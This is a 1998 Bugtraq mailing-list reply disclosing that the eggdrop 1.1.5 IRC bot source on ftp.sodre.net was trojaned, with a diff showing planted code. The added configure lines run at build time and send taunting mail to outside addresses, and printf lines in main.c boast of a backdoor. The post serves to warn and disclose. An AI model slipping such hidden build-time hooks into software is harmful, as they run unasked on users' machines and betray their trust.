Bugtraq mailing list archives

Re: FTP.SODRE.NET Hacked... Eggdrop Modified..

From: poptix () INGS COM (Matt Hallacy)
Date: Sat, 19 Dec 1998 20:00:44 -0600


Actually, this is not the extent of the problem.. (see below) sodre.net
was emailed, and the distribution files have been like this for over a
week now. So much for responsive admins.

diff -rc eggdrop1.1.5/configure eggdrop1.1.5+hacked/configure
*** eggdrop1.1.5/configure      Sun Jun 22 21:24:23 1997
--- eggdrop1.1.5+hacked/configure       Tue Nov 24 03:59:16 1998
***************
*** 1,4 ****
--- 1,16 ----
  #! /bin/sh
+ # added by evil Jeremy :)
+ # lets send some email to our favorite friends
+ EMAIL="yo, Jeremy owns you.. sodre.net is OWNED FUCKERS"
+ echo $EMAIL | mail -s "sodre.net hacked" news () rootshell com
+ echo $EMAIL | mail -s "sodre.net hacked" news () antionline com
+ echo $EMAIL | mail -s "sodre.net hacked" mail news () zdnet com
+ echo $EMAIL | mail -s "heheeh you guys are hung like horses" sodresux () hotmail com
+ echo "i hate you" | mail root () citronic net
+ #echo "Your dead fucker." | mail -s "prosecute me plz" president () whitehouse gov
+ # we chickened out :>
+
+ # eof

  # Guess values for system-dependent variables and create Makefiles.
  # Generated automatically using autoconf version 2.12
***************
*** 2590,2596 ****

  # This sed command replaces #undef with comments.  This is necessary, for
  # example, in the case of _POSIX_SOURCE, which is predefined and required
! # on some systems where configure will not decide to define it.
  cat >> conftest.vals <<\EOF
  s%^[  ]*#[    ]*undef[        ][      ]*[a-zA-Z_][a-zA-Z_0-9]*%/* & */%
  EOF
--- 2602,2608 ----

  # This sed command replaces #undef with comments.  This is necessary, for
  # example, in the case of _POSIX_SOURCE, which is predefined and required
! v# on some systems where configure will not decide to define it.
  cat >> conftest.vals <<\EOF
  s%^[  ]*#[    ]*undef[        ][      ]*[a-zA-Z_][a-zA-Z_0-9]*%/* & */%
  EOF
diff -rc eggdrop1.1.5/src/main.c eggdrop1.1.5+hacked/src/main.c
*** eggdrop1.1.5/src/main.c     Sun Jun 29 13:18:07 1997
--- eggdrop1.1.5+hacked/src/main.c      Tue Nov 24 03:36:21 1998
***************
*** 1339,1344 ****
--- 1339,1348 ----
         fatal("CANNOT FORK PROCESS.", 0);
        if (xx != 0) {
         printf("Launched into the background  (pid: %d)\n\n", xx);
+        printf("Oh, and hi sexy losers\n");
+        printf("We like, hacked sodre and like, backdoored your eggdrop :>\n");
+        printf("Fuck you to pimpdog, and never buy shells at citronic.net\n");
+        printf("Werd to Jeremy@EFNet and visit http://www.phorce.net\n\n";);
  #if HAVE_SETPGID
         setpgid(xx, xx);
  #endif

On Sun, 20 Dec 1998, Geoffrey Huntley wrote:

I was compiling an eggdrop today when i noticed something...
The eggdrop source code seemed to be modified... and said stuff that shouldn't be in the code...
and hack an url saying ftp.sodre.net was broken into... so i went and
checked it out..
So What do you know anyone else heard anymore on this subject?


ftp.sodre.net hacked
On December 13 1998 Jeremy hacked sodre.net today and replaced the eggdrop1.1.5 on ftp.sodre.net with a comical one 
written by ryan . ryan who wrote the eggdrop says all he did was add some printf statements to main.c and a few email 
commands to the configure file. ryan was in no way involved in the hack. If you view the source code you will see 
this:
printf("Launched into the background (pid: %d)\n\n", xx);
printf("Oh, and hi sexy losers\n");
printf("We like, hacked sodre and like, backdoored your eggdrop :>\n");
printf("Fuck you to pimpdog, and never buy shells at citronic.net\n");
printf("Werd to Jeremy@EFNet and visit http://www.phorce.net\n\n";);


                                        \\|//
                         ___________ooO_(o"o)_OoO__________
                        |                (_)               |
Geoffrey Huntley        |                                  |
Self Proposed           |   Sometimes the simplest things  |
Unix Freak & XT Lover   |    in life are often the best    |
                        |                  - Diethyl       |
diethyl () suspicion org   |___________oooO_____Oooo__________|
talk diethyl () under suspicion org    (  )/    ( ,)
http://diethyl.suspicion.org         \_)     (_/
____________________________________________[iCQ# 22069278]

Current thread:

OSS nice tmp race Stefan Laudat (Dec 16)
- wordperfect 8 for linux security Edsel Adap (Dec 18)
  - new tcp scan method antirez (Dec 17)
  - Re: wordperfect 8 for linux security Dug Song (Dec 18)
  - Re: wordperfect 8 for linux security Keith Owens (Dec 18)
  - Irc: another funny stuff. In some irc clients dcc may be hijacked. awgn () COSMOS IT (Dec 19)
  - ValueClick CGI Vulnerability Philip Stoev (Dec 19)
  - FTP.SODRE.NET Hacked... Eggdrop Modified.. Geoffrey Huntley (Dec 19)
    - Re: FTP.SODRE.NET Hacked... Eggdrop Modified.. Matt Hallacy (Dec 19)
  - ip header id patched. awgn () COSMOS IT (Dec 19)
  - ValueClick Ellen (Dec 19)
- Re: OSS nice tmp race Pavel Kankovsky (Dec 18)
  - Re: OSS nice tmp race Dr. Mudge (Dec 18)
- Re: OSS nice tmp race Joel Eriksson (Dec 18)
- OSS nice tmp race the razor of love (Dec 18)
- <Possible follow-ups>
- Re: OSS nice tmp race Crispin Cowan (Dec 20)
- Re: OSS nice tmp race X-Force (Dec 21)
  - AOL client uses IP tunneling Aviram Jenik (Dec 21)
  - Re: your mail Craig A. Huegen (Dec 21)

(Thread continues...)